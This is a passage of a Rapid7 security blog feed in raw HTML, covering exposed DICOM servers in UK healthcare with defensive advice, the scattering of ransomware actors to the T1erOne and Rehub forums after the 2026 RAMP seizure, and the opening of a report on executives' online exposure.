inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt80dd00001c6429e8/699f250da2156840331096fb/NHS-product-trends-over-time-graph.png" alt="NHS-product-trends-over-time-graph.png" caption="Figure 3: Visibility of selected healthcare technologies over time." height="672" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="NHS-product-trends-over-time-graph.png" width="1553" max-width="1553" max-height="672" style="max-width: 1553px; width: 1553px; max-height: 672px; height: 672px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt80dd00001c6429e8/699f250da2156840331096fb/NHS-product-trends-over-time-graph.png" data-sys-asset-uid="blt80dd00001c6429e8" data-sys-asset-filename="NHS-product-trends-over-time-graph.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 3: Visibility of selected healthcare technologies over time." data-sys-asset-alt="NHS-product-trends-over-time-graph.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 3: Visibility of selected healthcare technologies over time.</figcaption></div></figure><h2>External asset visibility and healthcare IT complexity </h2><p style="direction: ltr;"><span style='font-size: undefined;'>Healthcare IT environments evolve incrementally, with legacy protocols remaining operational because imaging equipment has long service lifecycles. This slow evolution can cause complications like: </span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Vendor default configurations are often inherited from initial deployment. </span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Third-party integrations extending network connectivity beyond hospital campuses.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Broad remote access supporting distributed clinical teams. </span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Cloud services introducing additional infrastructure layers that may not be consistently mapped alongside on-premise systems.</span></p></li></ul><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt11a93509d5eadc6f/699f261e56ca115149bb5704/UK-DICOM-top-ransomware-groups-graph.png" height="521" alt="UK-DICOM-top-ransomware-groups-graph.png" caption="Figure 4: Ransomware groups observed targeting UK/EU healthcare in 2025." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="UK-DICOM-top-ransomware-groups-graph.png" width="1003" style="width: 1003px; height: 521px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt11a93509d5eadc6f/699f261e56ca115149bb5704/UK-DICOM-top-ransomware-groups-graph.png" data-sys-asset-uid="blt11a93509d5eadc6f" data-sys-asset-filename="UK-DICOM-top-ransomware-groups-graph.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 4: Ransomware groups observed targeting UK/EU healthcare in 2025." data-sys-asset-alt="UK-DICOM-top-ransomware-groups-graph.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 4: Ransomware groups observed targeting UK/EU healthcare in 2025.</figcaption></div></figure><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt138272a2aa980cdf/699f261e883c6379c54d848f/UK-DICOM-monthly-ransomware-activity-graph.png" alt="UK-DICOM-monthly-ransomware-activity-graph.png" caption="Figure 5: Ransomware group activity observed around UK/EU healthcare in 2025." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="UK-DICOM-monthly-ransomware-activity-graph.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt138272a2aa980cdf/699f261e883c6379c54d848f/UK-DICOM-monthly-ransomware-activity-graph.png" data-sys-asset-uid="blt138272a2aa980cdf" data-sys-asset-filename="UK-DICOM-monthly-ransomware-activity-graph.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 5: Ransomware group activity observed around UK/EU healthcare in 2025." data-sys-asset-alt="UK-DICOM-monthly-ransomware-activity-graph.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 5: Ransomware group activity observed around UK/EU healthcare in 2025.</figcaption></div></figure><p style="direction: ltr;"><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>Within this context, continuous external visibility becomes challenging. Many organisations do not maintain a real-time inventory of internet-facing services across all owned IP ranges. And so, without deliberate intent,  a DICOM server or medical device can become externally reachable., Until specifically identified, the exposure can persist. The lesson?Infrastructure designed for ease of deployment can accumulate risk when oversight is periodic rather than continuous.</span></p><h2 style="direction: ltr;">How to reduce DICOM and medical device exposure</h2><p style="direction: ltr;"><span style='font-size: undefined;'>As ransomware groups accelerate and exploitation windows shrink, it would be easy to frame exposure as oversight. But that diagnosis would miss the point.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The issue is not a lack of cybersecurity awareness within the NHS. It is the structural complexity of modern healthcare IT environments, with legacy protocols continuing to operate alongside newer systems. </span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Vendor-default configurations are often inherited rather than re-architected. </span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Third-party integrations expand the digital perimeter beyond the hospital campus. </span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Remote access services enable flexible care delivery, while cloud adoption accelerates faster than traditional governance models can adapt.</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>In this kind of environment, many organizations lack continuous visibility into which services are externally exposed at any given moment. If you do not know a medical device or DICOM server is accessible from the internet, you cannot secure it. What was once ‘plug and play’ infrastructure can quietly become ‘plug and prey’.</span></p><h2 style="direction: ltr;">Securing DICOM servers in healthcare</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Organizations reviewing imaging system security should confirm whether Port 104 is accessible from outside trusted networks. Where external access is operationally required, it should be restricted through VPN controls and strong authentication. DICOM traffic should be encrypted where supported.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Additional steps include:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Reviewing firewall rules governing PACS and modality communication.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Conducting periodic external service discovery across owned IP ranges.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Verifying vendor default configurations during deployment and upgrade cycles.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Monitoring newly exposed services following infrastructure or cloud changes.</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>These measures focus on aligning network exposure with clinical intent. The objective is straightforward: Ensure that imaging systems are reachable only by the parties that need them.</span></p><h2 style="direction: ltr;">Healthcare cyber resilience starts with visibility</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Imaging systems play a central role in diagnosis and care planning, with operational disruption creating immediate clinical consequences.. As regulatory scrutiny of healthcare cybersecurity continues to increase, confirming that DICOM services operate within intended network boundaries is a practical and measurable step toward reducing risk.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The identification of more than 30 exposed systems highlights a visibility gap rather than a failure of awareness. Addressing that gap begins with systematic review of external-facing infrastructure and sustained monitoring over time.</span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/tr-mri-hidden-risks-exposed-dicom-servers-uk-healthcare</link>
      <guid isPermaLink="false">blt1d3df231b8c43b64</guid>
      <category><![CDATA[Research]]></category>
      <category><![CDATA[Labs]]></category>
      <category><![CDATA[Healthcare Security]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Wed, 25 Feb 2026 16:21:24 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blted8cb9466d79dc4d/6852c596a274324cfbb23d9d/PSN-gov-showcase-hero-image.png" medium="image" />
    </item>
    <item>
      <title><![CDATA[The Post-RAMP Era: Allegations, Fragmentation, and the Rebuilding of the Ransomware Underground]]></title>
      <description><![CDATA[<h2 style="direction: ltr;">Executive summary</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The January 2026 seizure of RAMP disrupted a major ransomware coordination hub, but it did not dismantle the ecosystem behind it. Instead, it destabilized trust and accelerated fragmentation across the underground.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Rather than consolidating around a single successor, ransomware actors are redistributing across both gated platforms like T1erOne and accessible forums such as Rehub. This shift reflects adaptation, not decline.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>For defenders, visibility into centralized coordination is shrinking. Monitoring must evolve beyond tracking individual forums to identifying actor migration, recruitment signals, and early indicators of regrouping. Disruption rarely eliminates ecosystems; it reshapes them. Organizations that adapt their intelligence strategies accordingly will be best positioned to stay ahead.</span></p><h2 style="direction: ltr;">Overview</h2><h3 style="direction: ltr;"><span style='color:rgb(58, 68, 73);'>The anatomy of the RAMP disruption</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Active since 2021, the RAMP (</span>Ransomware and Advanced Malware Protection)<span style='font-size: undefined;'> forum has established itself as a prominent hub within the cybercrime ecosystem, particularly for </span><a class="embedded-entry redactor-component block-entry" type="entry" target="_self" href="/fundamentals/what-is-ransomware" data-sys-entry-uid="blt07fb6bc3e48da201" data-sys-entry-locale="en-us" data-sys-content-type-uid="page" sys-style-type="link"><span style='font-size: undefined;'>ransomware</span></a><span style='font-size: undefined;'> operators and affiliates coordinating attacks, sharing tooling, and trading access to compromised networks. On 28 January 2026, the Federal Bureau of Investigation (FBI), in coordination with the U.S. Attorney’s Office for the Southern District of Florida and the Computer Crime and Intellectual Property Section of the U.S. Department of Justice (DoJ), seized the forum’s infrastructure (Figure 1).</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>While public reporting focused primarily on the law enforcement action, the underground reaction revealed a deeper and more consequential development: a collapse of trust and increasing fragmentation within the ransomware community.</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc598d4ee01bceb34/699f0050b9f0f2e2673235ae/Seizure-notice-RAMP-domain.png" alt="Seizure-notice-RAMP-domain.png" caption="Figure 1 - Seizure notice on RAMP’s domain" height="571" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Seizure-notice-RAMP-domain.png" width="781" max-width="781" max-height="571" style="max-width: 781px; width: 781px; max-height: 571px; height: 571px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc598d4ee01bceb34/699f0050b9f0f2e2673235ae/Seizure-notice-RAMP-domain.png" data-sys-asset-uid="bltc598d4ee01bceb34" data-sys-asset-filename="Seizure-notice-RAMP-domain.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 1 - Seizure notice on RAMP’s domain" data-sys-asset-alt="Seizure-notice-RAMP-domain.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 1 - Seizure notice on RAMP’s domain</figcaption></div></figure><p style="direction: ltr;">⠀</p><p><span style='font-size: undefined;'>Shortly after, the RAMP’s administrator, known as “Stallman”, confirmed on the cybercrime forums XSS and Exploit the seizure, stating that he would not attempt to rebuild it (Figure 2). The announcement immediately sparked debate. Some users questioned whether the takedown had been staged or was a “PR exit,” while others accused Stallman of cooperating with authorities. RAMP’s nameservers were subsequently observed pointing to infrastructure controlled by the FBI, confirming the seizure by U.S. law enforcement.</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf2c0c4fe686b06dd/699f00fd3b580e9a9224a833/Stallmans-post-on-XSS.png" alt="Stallmans-post-on-XSS.png" caption="Figure 2 - Stallman’s post on XSS" height="496" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Stallmans-post-on-XSS.png" width="937" max-width="937" max-height="496" style="max-width: 937px; width: 937px; max-height: 496px; height: 496px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf2c0c4fe686b06dd/699f00fd3b580e9a9224a833/Stallmans-post-on-XSS.png" data-sys-asset-uid="bltf2c0c4fe686b06dd" data-sys-asset-filename="Stallmans-post-on-XSS.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 2 - Stallman’s post on XSS" data-sys-asset-alt="Stallmans-post-on-XSS.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 2 - Stallman’s post on XSS</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>Following the announcement, screenshots purporting to show portions of RAMP’s database were circulated via Telegram and reposted across underground forums (Figure 3). These images allegedly contained user email addresses and private messages. Several former RAMP members publicly acknowledged that elements of the leaked data appeared authentic and expressed concern that registration emails, private communications, or operational details could be exposed and potentially leveraged in investigations.</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blta1553823aa6fb594/699f01416da803534e7b6a26/Screenshot-of-alleged-RAMP-leak.png" alt="Screenshot-of-alleged-RAMP-leak.png" caption="Figure 3 - Screenshot of alleged RAMP leak" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Screenshot-of-alleged-RAMP-leak.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blta1553823aa6fb594/699f01416da803534e7b6a26/Screenshot-of-alleged-RAMP-leak.png" data-sys-asset-uid="blta1553823aa6fb594" data-sys-asset-filename="Screenshot-of-alleged-RAMP-leak.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 3 - Screenshot of alleged RAMP leak" data-sys-asset-alt="Screenshot-of-alleged-RAMP-leak.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 3 - Screenshot of alleged RAMP leak</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>Stallman denied that any breach had occurred, claiming the forum’s disks were encrypted and that the circulating screenshots were fabricated.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Despite competing claims, underground discussions converged around two primary scenarios:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Scenario A: Prior breach</strong></span></p></li><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>The database was exfiltrated before the law enforcement seizure, and the subsequent takedown was unrelated to the leak.</span></p></li></ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Scenario B: Insider access</strong></span></p></li><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>An individual with administrative privileges exported the database, either before or during the seizure process.</span></p></li></ul></ul><p style="direction: ltr;"><span style='font-size: undefined;'>No clear consensus has emerged. However, based on behavioral patterns observed in previous forum seizures and the technical realities involved, pre-seizure database access appears plausible. Even if the database was encrypted, protection at rest does not prevent extraction while a system is actively running.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>There are also unverified allegations that Stallman attempted to sell the database for 10 bitcoin, though these claims remain unsubstantiated.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The alleged leak, combined with accusations of selective moderation and inconsistent rule enforcement, fueled speculation that RAMP may have functioned as a honeypot or had been compromised long before its seizure. While there is no public evidence confirming that RAMP was deliberately operated as a law enforcement trap, perception often matters more than proof in underground ecosystems. As such, the honeypot narrative itself accelerates fragmentation and contributes to a shift toward smaller, more tightly controlled ransomware platforms.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>With RAMP gone and no official successor announced, forum users quickly began discussing alternatives. Some argued that XSS should reconsider its prohibition on ransomware-related activity. XSS administrators reiterated that ransomware affiliate recruitment remains banned, likely to avoid attracting heightened law enforcement scrutiny. This sparked debate about the forum’s long-term positioning and whether it would maintain its policy stance or adapt to fill the vacuum left by RAMP.</span><br/><br/><span style='font-size: undefined;'>This cycle of centralized growth to sudden disruption and migration toward successor platforms follows a recurring pattern observed after previous underground takedowns. When a dominant forum falls, the immediate effect is fragmentation and suspicion. In the absence of a trusted central marketplace, actors temporarily disperse, debate compromise theories, and test new governance models. Over time, smaller, vetted communities emerge to re-establish trust through higher entry barriers and tighter moderation. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>A prominent precedent is the shutdown of the cybercrime marketplace RaidForums in 2022, which was followed by the rise of BreachForums, a successor platform that inherited much of the user base and continued many of the same discussions and transactions. RAMP’s disruption appears to be following this familiar trajectory, suggesting not an end to coordination, but a restructuring of how and where it occurs.</span></p><h3 style="direction: ltr;"><span style='color:rgb(58, 68, 73);'>Enter T1erOne: A potential successor</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>The vacuum left by RAMP’s disruption coincided with the emergence of T1erOne in early February, a closed forum with a reputation- and payment-based entry model. Membership requires either verified activity on other underground forums or a $450 payment, emphasizing exclusivity and trust vetting (Figure 4). This structure is designed to reduce the risk of infiltration or exposure, a direct response to the alleged leaks from RAMP.</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt7e240b608a36616a/699f019b6da8033e7d7b6a2a/T1erOne-registration.png" alt="T1erOne-registration.png" caption="Figure 4 - T1erOne registration" height="344" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="T1erOne-registration.png" width="784" max-width="784" max-height="344" style="max-width: 784px; width: 784px; max-height: 344px; height: 344px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt7e240b608a36616a/699f019b6da8033e7d7b6a2a/T1erOne-registration.png" data-sys-asset-uid="blt7e240b608a36616a" data-sys-asset-filename="T1erOne-registration.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 4 - T1erOne registration" data-sys-asset-alt="T1erOne-registration.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 4 - T1erOne registration</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>The T1erOne model is further consistent with how RAMP itself operated previously. The forum specifically required proof of activity on other major underground forums or payment of a registration fee to help filter out infiltrators and low-trust actors. While this similarity does not prove T1erOne is RAMP’s direct successor, it makes sense structurally as a model that RAMP veterans would try to replicate.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>While closed, paid-entry forums are not new, their emergence immediately after a high-profile seizure suggests defensive adaptation. By raising financial and reputational barriers, administrators reduce infiltration risk while signaling seriousness to high-value actors. If historical patterns hold, the next phase will likely involve smaller clusters of trusted actors consolidating around vetted spaces, with recruitment occurring through referrals rather than open posts. This reduces visibility but increases operational cohesion.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>While limited information is available about this forum at the time of writing, it clearly advertises a ransomware offering, suggesting an intention to cover the gap that RAMP left in the cybercrime ecosystem (Figure 5). By openly advertising that ransomware is permitted, T1erOne already differentiates itself from forums like XSS or Exploit, which explicitly ban ransomware discussions or operational planning. This signals to operators that T1erOne is a safe space for ransomware-related activity.</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt2214e700a198dde5/699f0232ba238fe7352f42a5/T1erOne-ransomware-advertisement.png" height="513" alt="T1erOne-ransomware-advertisement.png" caption="Figure 5 - T1erOne ransomware advertisement" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="T1erOne-ransomware-advertisement.png" width="1023" style="width: 1023px; height: 513px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt2214e700a198dde5/699f0232ba238fe7352f42a5/T1erOne-ransomware-advertisement.png" data-sys-asset-uid="blt2214e700a198dde5" data-sys-asset-filename="T1erOne-ransomware-advertisement.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 5 - T1erOne ransomware advertisement" data-sys-asset-alt="T1erOne-ransomware-advertisement.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 5 - T1erOne ransomware advertisement</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>Early indicators from underground discussions suggest that ransomware affiliate programs have already been referenced in promotional posts on the forum, implying that affiliates may be evaluating T1erOne as a potential coordination hub. Notably, the ransomware group Qilin appears to have established an early presence on the platform, actively advertising its Ransomware-as-a-Service (RaaS) offering in an effort to attract new affiliates (Figure 6). There are also references to the Cry0 ransomware group engaging on T1erOne. At the time of writing, however, neither group has publicly referenced the forum on their known communication channels, which may indicate that activity remains exploratory or limited to closed recruitment efforts rather than representing a fully endorsed migration.</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf53f61cd5384205d/699f186ebc49c46e138a81c1/Qilin-RaaS-advertisement-T1erOne.jpg" alt="Qilin-RaaS-advertisement-T1erOne.jpg" caption="Figure 6 - Qilin RaaS advertisement on T1erOne" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Qilin-RaaS-advertisement-T1erOne.jpg" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf53f61cd5384205d/699f186ebc49c46e138a81c1/Qilin-RaaS-advertisement-T1erOne.jpg" data-sys-asset-uid="bltf53f61cd5384205d" data-sys-asset-filename="Qilin-RaaS-advertisement-T1erOne.jpg" data-sys-asset-contenttype="image/jpeg" data-sys-asset-caption="Figure 6 - Qilin RaaS advertisement on T1erOne" data-sys-asset-alt="Qilin-RaaS-advertisement-T1erOne.jpg" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 6 - Qilin RaaS advertisement on T1erOne</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>T1erOne’s branding does more than advertise ransomware; it signals the continuation of an operational niche designed to fill the gap left in the cybercrime market. For defenders, this underscores a critical reality: The takedown of a public ransomware forum rarely ends operations; it alters where and how they occur. Threat actors migrate to smaller, more controlled communities where similar coordination persists, but with reduced transparency and higher barriers to monitoring. In this environment, disruption does not necessarily translate into deterrence. Rather, it drives a restructuring of the ecosystem into tighter, more resilient clusters, preserving operational continuity for threat actors while diminishing visibility for defenders.</span></p><h3 style="direction: ltr;">Rehub: Migration to an existing open forum</h3><p style="direction: ltr;"><span style='font-size: undefined;'>In parallel with the emergence of T1erOne, ransomware activity has also been observed on Rehub, an underground forum that predates RAMP’s takedown (Figure 7). Domain records indicate that the platform has been active since August 2025, suggesting it was not created in direct response to RAMP’s disruption. However, its recent activity indicates that it is absorbing at least part of the displaced ecosystem.</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt60c0fe0a26e480f8/699f02e747c5b08a1bc84dbf/Rehub-feed-screenshot.png" height="493" alt="Rehub-feed-screenshot.png" caption="Figure 7 - Screenshot from Rehub’s feed" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Rehub-feed-screenshot.png" width="1210" style="width: 1210px; height: 493px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt60c0fe0a26e480f8/699f02e747c5b08a1bc84dbf/Rehub-feed-screenshot.png" data-sys-asset-uid="blt60c0fe0a26e480f8" data-sys-asset-filename="Rehub-feed-screenshot.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 7 - Screenshot from Rehub’s feed" data-sys-asset-alt="Rehub-feed-screenshot.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 7 - Screenshot from Rehub’s feed</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>Unlike T1erOne, Rehub does not operate as a gated or reputation-based community. Registration requires only a username, password, and the answer to a basic security question, making entry significantly less restrictive. This low barrier to access contrasts sharply with T1erOne’s paid or reputation-based vetting model.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 researchers independently verified that several ransomware actors are already active on the platform. Notably, LockBit and the Gentlemen have maintained a presence on Rehub since September 2025, well before RAMP’s seizure. DragonForce, meanwhile, joined the forum on the same day RAMP was taken offline (Figure 8). The forum contains multiple posts openly advertising or discussing RaaS offerings (Figure 9).</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf99df53f389c9de7/699f032fb009386dea8333b1/Dragonforce-profile-rehub.png" alt="Dragonforce-profile-rehub.png" caption="Figure 8 - DragonForce’s profile on Rehub" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Dragonforce-profile-rehub.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf99df53f389c9de7/699f032fb009386dea8333b1/Dragonforce-profile-rehub.png" data-sys-asset-uid="bltf99df53f389c9de7" data-sys-asset-filename="Dragonforce-profile-rehub.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 8 - DragonForce’s profile on Rehub" data-sys-asset-alt="Dragonforce-profile-rehub.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 8 - DragonForce’s profile on Rehub</figcaption></div></figure><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt0b501120bdaf4eca/699f032f62d13904f0846b02/Gentlemens-RaaS-advertisement.png" alt="Gentlemens-RaaS-advertisement.png" caption="Figure 9 - Gentlemen’s RaaS advertisement" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Gentlemens-RaaS-advertisement.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt0b501120bdaf4eca/699f032f62d13904f0846b02/Gentlemens-RaaS-advertisement.png" data-sys-asset-uid="blt0b501120bdaf4eca" data-sys-asset-filename="Gentlemens-RaaS-advertisement.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 9 - Gentlemen’s RaaS advertisement" data-sys-asset-alt="Gentlemens-RaaS-advertisement.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 9 - Gentlemen’s RaaS advertisement</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>Rehub’s activity demonstrates that migration following RAMP’s disruption is not limited to newly established, closed communities. Instead, some actors appear to be leveraging pre-existing, lower-barrier platforms to continue coordination and recruitment.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Taken together, T1erOne and Rehub illustrate that post-disruption ecosystems rarely converge immediately around a single successor. Instead, they fragment across parallel coordination spaces before longer-term consolidation emerges.</span></p><h2 style="direction: ltr;">Conclusion: Fragmentation, not finality</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The post-RAMP landscape reinforces a familiar reality: Law enforcement can dismantle infrastructure, but it rarely dismantles the ecosystem behind it. Instead, disruption fractures trust and redistributes coordination across multiple platforms.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>What has emerged is not a single successor, but diverging migration paths. Gated forums like T1erOne reflect an attempt to rebuild trust through exclusivity, tighter vetting, and higher-entry barriers. At the same time, platforms like Rehub demonstrate that some ransomware actors are leveraging accessible, pre-existing forums to maintain operational continuity and recruitment momentum. This fragmentation suggests adaptation rather than decline. In the immediate aftermath of disruption, dispersion appears to be the dominant pattern, not consolidation.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>For defenders, this shift complicates visibility. Monitoring strategies can no longer focus on a single dominant forum. Instead, security teams must track actor migration patterns across multiple environments, identify early RaaS recruitment signals, and correlate underground developments with intrusion activity. As coordination spreads across both gated and open platforms, contextual and timely intelligence becomes critical.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>At Rapid7, we continuously monitor underground ecosystems to detect migration trends, emerging coordination spaces, and shifts in affiliate behavior before they scale into campaigns. By combining deep threat intelligence with frontline incident response insights, we help organizations maintain situational awareness even as ransomware coordination becomes more distributed and less predictable.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>RAMP’s takedown represents meaningful disruption, but not deterrence. As the ecosystem restructures across both exclusive and open platforms, defenders must adapt just as quickly to maintain the advantage.</span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/tr-post-ramp-allegations-fragmentation-ransomware-underground-rebuild</link>
      <guid isPermaLink="false">bltf508f2e583682ae8</guid>
      <category><![CDATA[Ransomware]]></category>
      <category><![CDATA[Research]]></category>
      <category><![CDATA[Labs]]></category><dc:creator><![CDATA[Alexandra Blia]]></dc:creator>
      <pubDate>Wed, 25 Feb 2026 13:56:38 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltebc2810157aecfaf/68af2715c53b04810df94abb/blog-hero-generic-pixel.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[New Report: The Digital Footprints of Many Executives Can Leave Their Companies Seriously Exposed]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>Senior leaders are visible by design. They speak at events, post on LinkedIn, sit on boards, and sign public filings. That visibility builds brands and drives growth. It also creates risk.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In our latest Rapid7 Labs report, </span><a href="https://www.rapid7.com/lp/executive-digital-footprints-threat-report/" target="_blank"><span style='font-size: undefined;'><em>Executives’ Digital Footprints: The Overlooked Corporate Vulnerability</em></span></a><span style='font-size: undefined;'>, we analyzed data from hundreds of engagements across 2024 and 2025 to understand how exposed today’s executives really are and what that means for the enterprise.</span></p><h2><span style='font-size: undefined;'>Behind our Executives' Digital Footprints report</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>The findings are clear: an executive’s online footprint is not just a privacy issue. It is a business risk.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Across industries, we found that surface web data, public records, social media activity, and leaked credentials combine to create a detailed profile that threat actors can weaponize. In many cases, 60% of an individual’s digital risk exposure is retrievable through a simple 